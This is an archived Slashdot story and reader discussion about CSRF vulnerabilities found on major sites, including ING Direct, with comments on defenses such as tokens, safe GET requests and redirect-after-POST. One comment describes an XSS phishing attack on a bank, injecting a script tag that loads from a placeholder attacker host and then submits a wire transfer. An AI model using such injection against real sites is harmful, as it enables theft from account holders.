Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
Security The Internet

CSRF Flaws Found On Major Websites, Including a Bank 143

An anonymous reader sends a link to DarkReading on the recent announcement by Princeton researchers of four major Web sites on which they found exploitable cross-site request forgery vulnerabilities. The sites are the NYTimes, YouTube, Metafilter, and INGDirect. All but the NYTimes site have patched the hole. "... four major Websites susceptible to the silent-but-deadly cross-site request forgery attack — including one on INGDirect.com's site that would let an attacker transfer money out of a victim's bank account ... Bill Zeller, a PhD candidate at Princeton, says the CSRF bug that he and fellow researcher Edward Felton found on INGDirect.com represents ... 'the first example of a CSRF attack that allows money to be transferred out of a bank account that [we're] aware of.' ... CSRF is little understood in the Web development community, and it is therefore a very common vulnerability on Websites. 'It's basically wherever you look,' says [a security researcher]." Here are Zeller's Freedom to Tinker post and the research paper (PDF).
This discussion has been archived. No new comments can be posted.

CSRF Flaws Found On Major Websites, Including a Bank

Comments Filter:
  • by suck_burners_rice ( 1258684 ) on Monday September 29, 2008 @10:06PM (#25200635)
    Just as a responsible institution has an independent auditor come to inspect their financial books for correctness, so should a responsible institution do with its computer systems and network security. The two are different only insofar as financial accounting is different from computer administration, but the need to audit both is equally pressing. This story serves as yet another example of the necessity for such things.
    • by Darkness404 ( 1287218 ) on Monday September 29, 2008 @10:08PM (#25200663)
      The problem isn't really that flaws were found, but that NYTimes refused to change them. If you look in 2600, you will see that even when hackers have posted step-by-step guides to 0wning S3rv3rs, the businesses just claim that it is supposed to be like that, or never getting around to fixing them.
    • by zobier ( 585066 ) <<ten.reiboz> <ta> <reiboz>> on Monday September 29, 2008 @10:45PM (#25200891)

      Repeat after me boys and girls "GET requests shouldn't change anything on the server".

      • Re: (Score:3, Insightful)

        by MrNaz ( 730548 )

        There are ways to safe GET requests. Unnecessarily avoiding the use of GET results in web sites that are not bookmarkable and where users can't provide links to their friends. So "hey check this out" and pasting a link becomes "hey check this out go to the main page, click here, then there, then on the other thing, then scroll down a bit to find the item in the list and then its halfway down that page".

        • by zobier ( 585066 ) <<ten.reiboz> <ta> <reiboz>> on Tuesday September 30, 2008 @12:00AM (#25201275)

          I didn't say anything about not having GET, I was talking about safe GET requests. Obviously it's OK to have a link to your user profile/picture gallery/&c. What is a bad idea is a link that will add someone as a friend or delete a picture, you get the idea.

      • by TheLink ( 130905 ) on Monday September 29, 2008 @11:28PM (#25201115) Journal
        GET requests in practice change stuff on the server. Making everything POSTs is just annoying - you get all those "click OK to resubmit form" messages and you don't even know what form it is.

        What they should do is sign urls (at least for significant stuff), so you can't just iframe a static url, you have to guess the correct url - which should change at least on a per session basis.

        e.g. instead of http://slashdot.org/my/logout it should be something like http://slashdot.org/my/logout?salt=123955813&sig=01af85b572e956347a56

        Where sig=sha1(concat(user session,salt,site secret,site time in hours))

        If sig doesn't match, you try to see if sig matches the time that rolled over:
        sig=sha1(concat(session,salt,site secret,site time in hours-1))

        user session = random string+primary key.

        For stuff that should not be resubmitted, you use another param to enforce that.
        • by spec8472 ( 241410 ) on Tuesday September 30, 2008 @12:18AM (#25201379) Homepage

          While GET does in practice change stuff on the server, the idea is that it should be repeatable without adverse effect.

          So, calling GET on a document might increase a hit counter, or update some other information - having me repeatedly call that function again should be safe.

          However using GET for Updating Account Details, or Moving money (just some purely /random/ examples) is just plain bad design.

          The example of signing GET requests is useful in some situations, but *mostly* not necessary if the design is right.

        • by darkfire5252 ( 760516 ) on Tuesday September 30, 2008 @12:19AM (#25201383)

          GET requests in practice change stuff on the server. Making everything POSTs is just annoying - you get all those "click OK to resubmit form" messages and you don't even know what form it is.

          ... CSRF exploits are not the reason that GET requests shouldn't change anything on the server. Implement all of your secret one time link programs, but you'll be disappointed when someone using an 'internet accelerator' that pre-fetches pages comes by and illustrates the reason that GET ought to be separate from POST...

          • by evanbd ( 210358 ) on Tuesday September 30, 2008 @02:01AM (#25201875)
            The spec is a little odd in this regard. It says that GETs should be idempotent -- repeating the request shouldn't change anything. That is not the same as saying that performing the request the first time shouldn't change anything. For example, clicking a "remove this from my shopping cart" link twice would have the same result as only doing it once -- the item is gone. But the request is still idempotent. That doesn't mean that you should do that, but it does conform to spec.
            • Re: (Score:3, Informative)

              by Bogtha ( 906264 )

              The spec is a little odd in this regard. It says that GETs should be idempotent -- repeating the request shouldn't change anything. That is not the same as saying that performing the request the first time shouldn't change anything.

              Have you actually read the spec [ietf.org]? Yes, it says that GET requests should be idempotent. It also says that GET requests should be safe. These are two different things. Saying that it requires GET requests to be idempotent, but this doesn't mean that they should be safe is te

          • Re: (Score:3, Interesting)

            by TheLink ( 130905 )

            Well then that sort of internet accelerator will break on slashdot, gmail etc, since the last I checked, with all of them, you can get logged out with a simple GET request.

            Clicking the following will result in a GET request that logs you out from slashdot:

            http://slashdot.org/my/logout [slashdot.org]

        • by tuma ( 1313099 ) on Tuesday September 30, 2008 @01:16AM (#25201701)

          GET requests in practice change stuff on the server. Making everything POSTs is just annoying - you get all those "click OK to resubmit form" messages and you don't even know what form it is.

          I agree that the "click OK to resubmit form" messages are annoying - and dangerous, because your average user has no idea what the message means, or what the implications might be of clicking OK.

          Fortunately, there is an extremely simple paradigm that works beautifully:

          1. When an HTTP request is going to change something on the server, make it a POST request.
          2. The server receives the POST request, and updates internal state, etc. When it is finished handling the internal changes (either successfully or not), it does NOT print an HTML page. Instead, it prints a REDIRECT message telling the web browser the next page it should GET. (You're the author of the web app, so you can build whatever ultra-specific URL you want here.)
          3. The web browser GETs the specified page and displays it, showing whatever HTML you deem to be appropriate as the result of the POSTed change.

          At the conclusion of this interchange, the user's browsing history only contains the GET page that was displayed before the POST, followed by the GET page showing the results. They can freely use their forward and back buttons to navigate within their history with no ill effect, and they will never see a "resubmit form?" question from their browser.

          I use this paradigm 100% of the time. You receive tremendous benefits by respecting the documented/intended behavior of GET/POST (e.g. no problems with caching or prefetch, and when a user intentionally resubmits a POST operation it will truly be resubmitted to the server), without the painful "resubmit form?" redux.

          • by TheLink ( 130905 )
            Yep, been doing that too.

            Note: this is mandatory for login forms.

            It's amazing some sites don't do it...

            So someone logs out, forgets to close browser, naughty person comes along goes back in browser history and resubmits the logon credentials!

            Hilarious.

            There's no need to do fancy/hardcore hacking when there's plenty of low hanging fruit like that.
          • by wrook ( 134116 )

            Thank you for that description. I'm not a web developer, but I occasionally build web applications for my own personal use. This is really helpful!

          • This is pretty much the standard paradigm in ruby on rails as well, as far as I can tell. Does work nicely.

          • When it is finished handling the internal changes (either
            successfully or not), it does NOT print an HTML page. Instead, it
            prints a REDIRECT message telling the web browser the next page it
            should GET.

            AMEN, brother! This is what I always do in my web applications - the trick is storing the result of the operation in a session variable. But after you've done that, you can forget about those "resubmit?" annoyances.

          • by dave420 ( 699308 )
            It's the Location: header, and it works exactly that way. I don't know why sites don't use it more often - it completely makes POSTing a non-issue for everyone concerned.
      • GET requests shouldn't change anything on the server

        That's not entirely accurate. GET requests should be idemponent, meaning that one request has the same effect as N identical requests. That actually has nothing to do with the server's own state, which may be caching internally or is otherwise able to handle resubmission gracefully.

        In any case, GET vs POST isn't a security concern—both are equally succeptible to exploits.

      • Repeat after me boys and girls "GET requests shouldn't change anything on the server".

        You can perform CSRF with POST just as easy as with GET.

      • by Monkier ( 607445 )

        If you want to point someone at something more authoritative:

        * Use GET if:
        o The interaction is more like a question (i.e., it is a safe operation such as a query, read operation, or lookup).
        * Use POST if:
        o The interaction is more like an order, or

      • by Monkier ( 607445 )

        reminds me of a story: i worked somewhere where the 'send out mailing list emails' was a script u hit in your browser, something like: http://website.com/domailinglist [website.com] to send out all the emails..

        turns out every night the webstats package would go thru the server logs and GET every page to find the title tag.. do'h

      • by ebeeson ( 716839 )
        Repeat after me: "telling people 'GET shouldn't change anything' reinforces the dangerously incorrect notion that POST can't be forged".

        JavaScript makes it *trivial* to POST data to an arbitrary server. Seriously, the only way to properly deal with this is to include and verify some sort of token in all POST requests (along with not allowing GET requests to modify data)
      • by dougmc ( 70836 )
        No, I won't. It's not that simple.

        Sure, that's a nice rule of thumb, one you'll probably not go wrong following, but it's not a rule in general.

      • by brunes69 ( 86786 ) <[gro.daetsriek] [ta] [todhsals]> on Tuesday September 30, 2008 @09:22AM (#25203697) Homepage

        Changing GET to POST does not, in any way shape or form, protect you from a CSRF attack.

        If you think it does and have been doing this on your own site or projects, you have some more research and work to do.

        All changing GET to POST does is make it a tiny bit harder for Joe n00b hacker. But anyone with half a clue knows how to use JS to do CSRF using POST requests.

      • by jc42 ( 318812 )

        Repeat after me boys and girls "GET requests shouldn't change anything on the server".

        Nonsense. Every GET request changes something on the server. It adds a line to the server log. So you're banning all GET requests.

        Actually, I think I know what you meant to say. But the above statement is so over-simplified and dumbed down that it's just wrong. If my boss were to seriously attempt to enforce such a dumb rule, I'd be updating my resume really fast.

        Unfortunately, the correct guideline needs to be a bit

        • by zobier ( 585066 )

          You're right but you also sound like you know what you're doing.
          It's both sad and dangerous how many web developers haven't the faintest clue WTF is going on.

    • by Corbets ( 169101 )

      Actually, you'll find that many auditing firms (such as Deloitte or PwC) offer both services. They go hand in hand, because the audit mindset is at some level the same.

      The trick we face, of course, is convincing IT-types of how important it is, whereas accountants either already understand the need, or accept that the law requires it (NOT that I'm proposing making this a legislative requirement!).

  • Why is it that... (Score:5, Interesting)

    by Darkness404 ( 1287218 ) on Monday September 29, 2008 @10:06PM (#25200641)
    Why is it that some business even when notified of a major security risk either say that it is functioning normally or not patch the thing right away? Do some businesses not have sysadmins or what? If I got an E-mail that said that my servers could be owned by such and such exploit by doing this and this, I would immediately take action.
    • Re: (Score:3, Insightful)

      by Ostracus ( 1354233 )

      "If I got an E-mail that said that my servers could be owned by such and such exploit by doing this and this, I would immediately take action."

      Except another recent E-mail says that your job just has been outsourced and you have five minutes to clean out your desk. Happy fixing.

    • Hanlon's Razor (Score:5, Insightful)

      by A non-mouse Coward ( 1103675 ) on Monday September 29, 2008 @10:38PM (#25200855)
      I think Hanlon's Razor [wikipedia.org] is in play here.

      Never attribute to malice that which can be adequately explained by stupidity.

      Don't assume these people don't care or don't want to fix it. CSRF is in the class of "WebAppSec" (what the kids call it these days) that is not "syntactic" in nature; meaning that you cannot just say "here, use this API and you're safe". It's a "semantic" problem; the developer has to both understand "how" sensitive transactions can be abused AND "how" these transactions can be fixed (like with a nonce [wikipedia.org]).
      It's probably just that they don't know how to do it, at least not manageably on an average budget.

    • Re:Why is it that... (Score:5, Interesting)

      by Chundra ( 189402 ) on Monday September 29, 2008 @11:05PM (#25200995)

      Because many (most?) large organizations have so many layers of bureaucratic red tape to cross that it's extremely difficult to ever get anything done quickly. Here's an example of what was involved in installing a vendor's security patch in a company I used to work for.

      We'd have to test the changes in a sandbox environment and engage all stakeholders of all systems that even remotely touched the app. They would have to buy off on the change entering the development environment. Time spent here: 1-5 days depending on approvals.

      We'd schedule a move to dev and immediately work with the help desk (to update their documentation--needed or not), and work with packaging teams to "productize" the change (which mind you, was often a simple configuration change or an installer from a vendor). We'd test the new rerolled installer and if it looked ok request buyoff from all stakeholders after they performed their tests. We'd request to move to the integration testing environment if all looked good. Time spent here: 2-6 weeks depending on approvals and packaging issues.

      In the integration testing environment disgruntled test lab system administrators got involved. They'd work with the deployment teams to install the packages, but only during certain scheduled times that both the admins and the software deployment groups agreed to. Again we'd need buy off from all stakeholders after they did full regression tests to get past this gate. Any problems meant you went back to Dev. Time spent here: 2-4 weeks depending on approvals and scheduling.

      Leaving integration testing you reach the user acceptance environment. Here the same disgruntled system administrators would be involved and the process was pretty much the same as in the integration testing environment. Except now instead of just stakeholder buy off you'd need to get buy off from the performance testing teams. If they gave a thumbs up, you'd have to work on scheduling focus groups with small subsets of real end users. Time spent here: 2-6 weeks depending on approvals.

      Now, if the planets were correctly aligned and you said all your prayers, you would then have the opportunity to schedule a move to production. This usually results in at least a 1 week delay. In production, the people who know how things work are not allowed to touch anything due to various regulatory requirements and separation of duties. So in production, you deal with a different set of disgruntled systems administrators and a variety of production control operators. These are completely different guys than the ones in the test lab. They are incapable of doing anything except for exactly what you specify in an "engineering packet" which details in obscene detail exactly what needs to be done. Think of the level of detail you'd have to provide to a 10 year old with ADHD. Before working with them you'd go to the "change review board" which meets once a week, and if you were lucky and got all your forms filled out correctly you'd get a time slot to have those admins and operators push your change out. They often times screwed something up so you'd be delayed at least another week. Time spent getting into production: 1-5 weeks.

      It was truly fucked, but seems to be the norm across all the larger organizations I've ever worked in.

      • by guruevi ( 827432 )

        You were lucky, I was in a company once where change had to be approved in a similar process. Except the departmental meetings to bring up the change issue was once a week, the inter-departmental meetings to bring up changes across stakeholders in different departments was maybe once a month (if you were lucky). Once you got the whole project together and sat through many inter-departmental meetings listening to petty catfights in HR or finance and got everybody to sign off on the approval, you had to go in

  • The CEO had already taken all the money in your account. There is nothing left in your account. So the hacker could do any more damage. This is the new security measure that thwarts the hackers. Now the CEO wants another 700Billion dollars for this brilliant outflanking of the hacker.
  • Recent stock market crash and bank sales are actually a ploy by some clever Russian hackers...
  • Very nasty (Score:5, Informative)

    by Twigmon ( 1095941 ) on Monday September 29, 2008 @10:27PM (#25200785) Homepage

    This looks like a very nasty attack to defend against. More info:

    http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org]

    • Re: (Score:2, Informative)

      by SRowley ( 907434 )
      The linked paper shows that a few very simple things can defend against this attack altogether:
      • Don't allow GET requests to modify anything
      • Send a pseudorandom token with every form

      It's just not a very well known attack.

      • Re: (Score:3, Informative)

        by Curien ( 267780 )

        Don't allow GET requests to modify anything

        That doesn't protect you. Sure, it prevents the img tag vector, but it doesn't stop an attacker from convincing users to submit an arbitrary form.

        Send a pseudorandom token with every form

        As far as I can tell, that's the only solution that doesn't rely on Javascript shenanigans, but it doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

        • by this great guy ( 922511 ) on Monday September 29, 2008 @11:40PM (#25201151)

          [A pseudorandom token] doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

          Saying that is like saying "cryptography doesn't really provide privacy, because it is subject to brute force". Of course pseudorandom tokens stop CSRF attack (when implemented properly).

        • how exactly would the attacker use a brute force attack on a CSRF vulnerability? i don't think a user can be convinced to resubmit a form more than 2-3 times, much less the hundreds of thousands of times necessary to crack any moderately secure session token.

          and all you need to do is block outside referrers. that's the oldest trick in the book. it's simple to implement and effectively protects against most CSRF attacks.

          • by Curien ( 267780 )

            First off, you don't need to have the user actually click submit. You can submit forms with Javascript or even just use XMLHTTPRequest.
            Secondly, checking referrers is pointless. It's easy to lie about them.

        • by Sancho ( 17056 ) *

          As far as I can tell, that's the only solution that doesn't rely on Javascript shenanigans, but it doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

          The token should have a very short lifetime. If the attacker can brute-force the token before it expires, yes, they'll win, but correctly-implemented, that should not happen.

        • Send a pseudorandom token with every form

          As far as I can tell, that's the only solution that doesn't rely on Javascript shenanigans, but it doesn't really stop it. All it does is reduce the problem to a cryptographic attack -- which is subject to brute force.

          The nature of CSRF is that one of your legit users has to be a party to the attack (of which the are ultimately the victim), though. Is one of my users going to click a CSRF-exploit link 4 billion times in a row, where each attempt displays a page t

    • Very easy (Score:4, Informative)

      by SanityInAnarchy ( 655584 ) <ninja@slaphack.com> on Monday September 29, 2008 @10:45PM (#25200893) Journal

      Ruby On Rails has prevented this, by default, for almost a year:

      http://api.rubyonrails.org/classes/ActionController/RequestForgeryProtection/ClassMethods.html [rubyonrails.org]

      That not only prevents against the image hack, it also prevents against things like a hidden form in an iframe.

      Granted, it's still possible for you to do stupid things with GET requests, and it's possible you could turn it off entirely. But it's pretty trivial to stay safe here.

      And no, there's not really going to be a sane way for browsers to protect you from this, unless you've left on all the annoying "You are about to send data over the internet!!!1!one" warnings. This is really going to be up to site admins to fix.

      • Re: (Score:2, Insightful)

        by Twigmon ( 1095941 )

        That unfortunately doesn't defend against GET requests. This means that if your script allows anything vulnerable to be requested via GET, then the 'image' attack vector is not protected. This includes when GET requests are supposed to be made via xmlhttprequest..

        It does defend against a form in a hidden iframe, however, you have to actually *use* it for your application to be protected.

        Regarding browsers fixing the problem, you are correct. It's very very unlikely that the developers of browsers will imple

        • That unfortunately doesn't defend against GET requests. This means that if your script allows anything vulnerable to be requested via GET, then the 'image' attack vector is not protected.

          Correct. That's why I mentioned "stupid things with GET requests", and why the page I linked to also links to some documentation about idempotence.

          Building an app on top of this, I don't think I've ever written a GET request that modifies anything it shouldn't.

          It does defend against a form in a hidden iframe, however, you have to actually *use* it for your application to be protected.

          True, but it is enabled by default in the new skeleton ApplicationController, and the whole secret key thing is negated by the new default cookie-based session store.

          So, you have to pay attention when porting an old app, but you should be paying atten

      • by nacturation ( 646836 ) * <nacturation@gmAUDENail.com minus poet> on Monday September 29, 2008 @11:49PM (#25201199) Journal

        Ruby On Rails has prevented this, by default, for almost a year...

        Nice boast, but I'll see your Ruby on Rails for almost a year and raise you a .NET viewstate for five and a half years [microsoft.com]. Go Microsoft!

        • Re: (Score:3, Informative)

          My boast wasn't about Ruby, it was pointing out the trivialty of the problem.

          If Microsoft has actually done this, and done it right, for five and a half years, great! It means even less of an excuse for anyone to get it wrong.

    • can someone please explain to me why the wikipedia page on the confused deputy problem [wikipedia.org] (the class of attacks to which CSRF belongs to) contains a picture of Don Knotts?

      i really don't see what Barney Fife has to do with privilege escalation or computer security.

  • Details and Examples (Score:5, Informative)

    by nmb3000 ( 741169 ) <nmb3000@that-google-mail-site.com> on Monday September 29, 2008 @10:28PM (#25200787) Journal

    For anyone curious, Jeff Atwood of Coding Horror recently wrote about them [codinghorror.com] in his blog. Included are some additional details and a couple of examples.

    At face value it's a somewhat obvious exploit, but still interesting.

    • by sam0737 ( 648914 )

      I think using nonce in the form is also a very effective way to prevent CSRF?

      Nonce is Number-just-used-Once. Basically it is just a number generated by server, known to the server and client. Think it likes the Captcha that other site can't guess the current value, except the answer is known to the browser automatically.

      I didn't mention in the FAQ in the parent.

      Web application developer should really learn from existing webapp, like blogs like Wordpress or any other popular forum software, they are usally a

  • Heh (Score:5, Funny)

    by FlyByPC ( 841016 ) on Monday September 29, 2008 @10:32PM (#25200811) Homepage
    "...four major Websites susceptible to the silent-but-deadly cross-site request forgery attack..."

    I knew something smelled funny...
    • "...four major Websites susceptible to the silent-but-deadly cross-site request forgery attack..."

      I knew something smelled funny...

      That would be methane.

    • by KGIII ( 973947 ) *

      Was it you that tagged this "silentbutdeadly fart" then? ;) (I think you have to use the beta front page view to see that tag though.)

    • "...four major Websites susceptible to the silent-but-deadly cross-site request forgery attack..."

      I knew something smelled funny...

      GASP! It's the methane! We're all gonna die!

  • Since the CSRF request will come with the referrer header set to the attacker's site, then validating the referrer should also counter this attack.

    This is not the same as the the "same origin policy" in Appendix B of the paper.

    • Re: (Score:1, Informative)

      by Anonymous Coward

      The referer field is optional and unreliable. It should never be used for security.

      • by argent ( 18001 )

        Optional, perhaps, but in practice I've used it to discourage address scrapers for over 10 years and don't recall a single complaint from anyone about requiring a referrer. In practice it's almost always present.

        And unreliable? How would it fail in a way that delivered the correct URL for a referrer check over an HTTPS connection? It won't be even seen by a proxy, let alone modified or removed.

        The worst case is a false positive, and only if the end user has explicitly chosen to disable it.

        • I've used it to discourage address scrapers

          This is the kind of tactic that I just don't get. Unlike random session tokens, referrer-checking is an arms race that the other side can trivially win. The scraper writer just has to spend 2 minutes adding a pass-referrers feature to his program, and then for the next 10 years you get perfectly normal-looking requests. Sure, it might work a little and turn away some really old scrapers, but in the end you're going to get scraped anyway. So why bother?

          • by argent ( 18001 )

            Unlike random session tokens, referrer-checking is an arms race that the other side can trivially win. The scraper writer just has to spend 2 minutes adding a pass-referrers feature to his program

            Because it's virtually free to do and it DOES block some attempts. While it's possible some of them are scrupulous there's a LOT of traces in my logs from spidering software that is unimaginably sloppy. Basically, lots of them simply don't bother.. possibly because enough people figure that it's trivially defeated

      • your comment suggests that you don't understand what a CSRF attack is.

        http referer can be intentionally spoofed by an untrusted browser, but a CSRF attack is executed by an untrusted page on a trusted browser. in this case the server is not the target, the user is. the attacker's page can cause the victim's browser to make a forged GET or POST request without the user's knowledge, but the request headers are still set by the browser, and thus cannot be altered by the attacker.

        if you were using http referer

        • by pavon ( 30274 )

          The referrer can be spoofed using javascript [cgisecurity.com] (XMLHttpRequest), and thus cannot be depended on even with trusted browsers.

          • Re: (Score:3, Informative)

            hrmm... i was not aware of this. i thought XMLHttpRequest could not be executed across domains. this seems like a pretty serious security design flaw.

            i mean, shouldn't the same origin security policy [mozilla.org] prevent XMLHttpRequest from making requests across domains? i remember when i wrote AJAX applications in the past that i couldn't even call XMLHttpRequest on a subdomain.

    • Last year I went around adding CSRF protection to my employer's site, and I had my check-the-session-token function go ahead and look at the referrer too, just as an "extra" check. If either the token or the referrer was wrong, reject the request.

      I ended up having to remove the referrer check, because too many people were passing blank referrers. It's well-known that there are browsers or proxies out there which remove that, in the name of privacy or whatever. What I didn't know, though, is that a lot o

      • by argent ( 18001 )

        What I didn't know, though, is that a lot of nontechnical users are unknowingly using these privacy-protecting tools. Maybe they're being deployed as transparent proxies at large orgs or something

        A lot of proxies drop referrers and user agents, yeh. There's proxies specifically for that.

        But they can only do that for plain HTTP connections. They can't look inside HTTPS.

  • by z0idberg ( 888892 ) on Monday September 29, 2008 @10:46PM (#25200901)

    including one on INGDirect.com's site that would let an attacker transfer money out of a victim's bank account

    With my INGdirect account (in Australia) you can only transfer your savings back into your normal bank account that is associated with the ING account. So I don't think an an attacker could actually transfer money out to somewhere they could get it. Associating another bank account with the ING account requires more than just logging in to your ING account (phone/written permission etc. IIRC).

    The attacker would be able to cause some inconvenience and will get your bank account number etc. but I can't see how they would actually get your money.

    • The attacker would be able to cause some inconvenience and will get your bank account number etc. but I can't see how they would actually get your money.

      It shouldn't be that big of a risk, since those are the same numbers that are on a check.

      • The full numbers of the accounts are never displayed after you create an account. All they would get would be the last four digits.
        • For a check or ING Direct?

          Answer:
          You are wrong.

          On both, the full account number is displayed, since that is what you need to use the account for an ETF or with a check.

          • I guess I was wrong about the ING account numbers, but I was mostly referring to the other account numbers. I just checked, and my other verified accounts I can transfer to do not show the full numbers, so I would not have to worry about my personal banking account number being discovered. I had to enter them when I set up the account, but they do not display that information after the initial setup. Obviously a check has the account number on it (as well as the routing number).
    • by Xelios ( 822510 )
      The situation is similar in Germany with just about all internet banking. No money can be transferred online without inputting a 6 digit number called a TAN code. Whenever you run out you request another list of TAN codes from the bank which get sent to you by registered mail. When you transfer money through a bank's website it'll ask you for a random TAN code number (like "Enter TAN number 93"), once a TAN code is used it can't be used again. Each time I log into my bank's website it shows me the last TAN
    • The PDF described the attack in detail. The attacker opens a new ING account in your (logged-in) identity, transfers any amount of your money from your personal linked account into "your" new ING account, adds any arbitrary payee (the attacker's own ING account, opened previously), then transfers funds from "your" new ING account to the attacker's ING account. They say it's been fixed, but please don't presume this wasn't a major issue.
  • Really? If your idea of "the web community" is people who rely on the code fragments at php.net to do their jobs, maybe.
  • Translation: The idiot who set up the site left holes for post values.

    Honestly its not as complex as people describe it, atleast if its reffering to what I think its reffering to.

    You can exploit this type of vulnerability by viewing the source of the target website, figuring out how it works together, and writing up an html form. I use it to automatically log my self into a lot of secure web based tools I use at work without having to input login info.

  • Big flippin deal (Score:4, Interesting)

    by Jeffrey Baker ( 6191 ) on Monday September 29, 2008 @11:07PM (#25201013)

    Any chump can transfer money out of any bank account with nothing but a fax. Try it some time. People don't do it because it's a felony and people generally don't want to go to prison.

    Also, there were several CSRF attacks that came across Bugtraq in 2000 and 2001. Some of them were against banks.

  • So... CSRF is vastly not understood or ignored by the Web community? Wow! How could that be? The article says exacly NOTHING about what it actually is, or how it is accomplished!

    Is it possible that this refers to Cross-Site Scripting? In which case, LOTS of people know about it, and while some sites may be vulnerable, most professionals are aware.

    If this is NOT cross-site scripting, then how is it different? The article says nothing about that. Is this a real alarm (in which case we need to know what
    • Re: (Score:1, Informative)

      by Anonymous Coward

      There's a direct link to the research paper in the summary. There's also a link in the first paragraph of the article. It says plenty, you just need to look. :)

      Is it possible that this refers to Cross-Site Scripting?

      No, the article states categorically that this is not cross-site scripting.

      • I followed the links and I see how this works. (FYI, the phrase is "uncategorically", not "categorically", and probably had no relevance here. I think you meant "specifically".)

        In any case, even if I am wrong in that, thanks for pointing me in the right direction. I understand now that it is different.
    • Re: (Score:2, Informative)

      by moniker127 ( 1290002 )

      Its hard to tell, but my guess is that its regular old post values.

      Almost all forms on the internet are powered by the html tag. Inside of this , different fields are indicated by s.

      These inputs are either manipulated by javascript, or sent to another page. There are two ways to send them to another page with strait HTML.

      The first is called GET. It sends it by putting a ? on the end of the page, and then just listing the values. it will look like http://www.google.com?q=123 [google.com] . q is the name of the field, 12

      • Whoops, apparently it parsed my HTML tags. There are several parts in there where i meant to type in (without the dots).
        • GRR. It just takes out all tags. I meant to type in >form (with the arrows turned around)

          • by KGIII ( 973947 ) *

            As the AC pointed out you're in HTML format. I change the settings to always post in plain text. It is easier and paragraph breaks work better as well and you can still use HTML in it. I'm not sure if I did anything special or if it just likes me but it also automagically makes typed URLs links.

      • that has nothing to do with CSRF [wikipedia.org]. if the other article is unclear, try reading the Freedom to Tinker article [freedom-to-tinker.com].
    • by sk89q ( 1087579 )
      XSS is done on the target site. CSRF is done on a different site.
  • irony (Score:3, Funny)

    by The Clockwork Troll ( 655321 ) on Monday September 29, 2008 @11:51PM (#25201219) Journal
    The unexpected conclusion of Zeller and Felton's paper is that the worldwide banking collapse is actually a protective measure against malware. With assets illiquid, even CSRF attacks can't move money!
  • You don't even need read cookies to exploit
    this feature.
    This technique is probably used in stock fraud
    pump-and-dump schemes. Google Finance has a
    trend display that shows the most "popular"
    stock base on the the Gooogle Trend technology.
    Fraudsters probably popularize stocks they've
    purchased by seeding web sites with images that
    search Google for the company name of the stock.
    As more folks search the company, the stock
    becomes more popular. As it get popular it gets
    more eyeball looking at it and investing in it
    w

  • Unsurprising (Score:5, Informative)

    by karmatic ( 776420 ) on Tuesday September 30, 2008 @02:06AM (#25201899)

    This really isn't that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.

    So, in an attempt to get to another site, I typed some HTML into the search box on their homepage, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.

    So, I got home, and whipped up a phishing email. It went to wellsfargo.com, used a little javascript to do a popunder, and set window.location to wellsfargo.com. The popunder self-refreshed every few seconds, and checked the cookies to see when the user had logged in. After the user logs in, it waits 9 minutes (auto-logout was 10 minutes), and then would build a form to initiate a wire transfer, and submit it - while the user was still logged in. It would then close the popunder.

    So, with a simple link to a search for something like <script src="http://evilsite.tld">, I could take complete control over someone's bank account. This would be easy to pull off with an email saying something like "We have detected suspicious activity; click here to log on to wellsfargo.com". It really would take them to wellsfargo.com, and they could log in. You don't need a user/password if you control the browser.

    I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn't excuse that 1) they should know better, and 2) if you're going to check anything, it should be the one form that's on every page.

  • Will Firefox w/NoScript installed block this sort of misbehavior?

He keeps differentiating, flying off on a tangent.

Working...